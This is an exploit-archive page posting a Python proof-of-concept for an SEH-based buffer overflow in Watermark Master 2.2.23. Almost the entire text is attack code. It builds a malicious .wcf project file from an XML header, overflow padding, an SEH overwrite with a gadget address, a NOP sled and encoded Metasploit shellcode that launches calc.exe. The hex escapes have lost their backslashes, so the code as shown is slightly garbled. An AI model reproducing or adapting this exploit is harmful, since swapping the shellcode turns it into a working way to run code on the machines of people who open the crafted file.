Home / exploits Watermark Master Buffer Overflow SEH
Posted on 03 November 2013
#!/usr/bin/python # Exploit Title:Watermark Master Buffer Overflow (SEH) # Date found: 31.10.2013 # Exploit Author: metacom # URL:http://www.videocharge.com/download.php # Software Link:www.videocharge.com/download/WatermarkMaster_Install.exe # Version: 2.2.23 # Vulnerable products:Watermark Master and Watermark Master + SDK # Tested on: Windows XP SP3 # Poc video demo : http://bit.ly/19enbvN from struct import pack head=("x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2Ex30" "x22x20x65x6Ex63x6Fx64x69x6Ex67x3Dx22x57x69x6Ex64x6Fx77x73x2D" "x31x32x35x32x22x20x3Fx3Ex3Cx63x6Fx6Ex66x69x67x20x76x65x72x3D" "x22x32x2Ex32x2Ex32x33x2Ex30x30x22x3Ex0Ax0Ax3Cx63x6Fx6Cx73x20" "x6Ex61x6Dx65x3Dx22x46x69x6Cx65x73x22x2Fx3Ex0Ax0Ax3Cx63x6Fx6C" "x73x20x6Ex61x6Dx65x3Dx22x50x72x6Fx66x69x6Cx65x73x22x3Ex0Ax0A" "x3Cx50x72x6Fx70x65x72x74x79x20x6Ex61x6Dx65x3Dx22x50x72x6Fx66" "x69x6Cx65x22x3Ex0Ax0Ax3Cx63x6Fx6Cx73x20x6Ex61x6Dx65x3Dx22x57" "x61x74x65x72x6Dx61x72x6Bx73x22x2Fx3Ex0Ax0Ax3Cx63x6Fx6Cx73x20" "x6Ex61x6Dx65x3Dx22x54x69x6Dx65x6Cx69x6Ex65x73x22x2Fx3Ex0Ax0A" "x3Cx63x6Fx6Cx73x20x6Ex61x6Dx65x3Dx22x53x74x72x65x61x6Dx73x22" "x3Ex0Ax0Ax3Cx50x72x6Fx70x65x72x74x79x20x6Ex61x6Dx65x3Dx22x53" "x74x72x65x61x6Dx22x3Ex0Ax0Ax3Cx56x61x6Cx75x65x20x6Ex61x6Dx65" "x3Dx22x53x6Fx75x72x63x65x50x61x74x68x22x20x74x79x70x65x3Dx22" "x38x22x20x76x61x6Cx75x65x3Dx22") #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai #-b 'x00x0ax0dx3cx22x26' -t c shellcode = ("xbbx80xa3x02xb2xdaxccxd9x74x24xf4x5ex31xc9xb1" "x33x31x5ex12x03x5ex12x83x6ex5fxe0x47x92x48x6c" "xa7x6ax89x0fx21x8fxb8x1dx55xc4xe9x91x1dx88x01" "x59x73x38x91x2fx5cx4fx12x85xbax7exa3x2bx03x2c" "x67x2dxffx2exb4x8dx3exe1xc9xccx07x1fx21x9cxd0" "x54x90x31x54x28x29x33xbax27x11x4bxbfxf7xe6xe1" "xbex27x56x7dx88xdfxdcxd9x29xdex31x3ax15xa9x3e" "x89xedx28x97xc3x0ex1bxd7x88x30x94xdaxd1x75x12" "x05xa4x8dx61xb8xbfx55x18x66x35x48xbaxedxedxa8" "x3bx21x6bx3ax37x8exffx64x5bx11xd3x1ex67x9axd2" "xf0xeexd8xf0xd4xabxbbx99x4dx11x6dxa5x8exfdxd2" "x03xc4xefx07x35x87x65xd9xb7xbdxc0xd9xc7xbdx62" "xb2xf6x36xedxc5x06x9dx4ax39x4dxbcxfaxd2x08x54" "xbfxbexaax82x83xc6x28x27x7bx3dx30x42x7ex79xf6" "xbexf2x12x93xc0xa1x13xb6xa2x24x80x5ax0bxc3x20" "xf8x53") buffer="x41" * 516 buffer+="xebx06x90x90"# buffer+=pack('<I',0x02700fee)#0x02700fee : popad # jmp ebp buffer+="x90" * 100 shellcode+="xCC" * (10000 - len(buffer)) end=("x22x2Fx3Ex0Ax0Ax3Cx2Fx50x72x6Fx70x65x72x74x79x3Ex0Ax0Ax3Cx2F" "x63x6Fx6Cx73x3Ex0Ax0Ax3Cx63x6Fx6Cx73x20x6Ex61x6Dx65x3Dx22x52x6F" "x6Dx61x6Ex69x61x20x53x65x63x75x72x69x74x79x20x54x65x61x6Dx22x2F" "x3Ex0Ax0Ax3Cx2Fx50x72x6Fx70x65x72x74x79x3Ex0Ax0Ax3Cx2Fx63x6Fx6C" "x73x3Ex0Ax0Ax3Cx2Fx63x6Fx6Ex66x69x67x3E") off= head + buffer + shellcode + end try: out_file = open("crash.wcf",'w') out_file.write(off) out_file.close() print("[*] Malicious wcf file created successfully") except: print "[!] Error creating file"
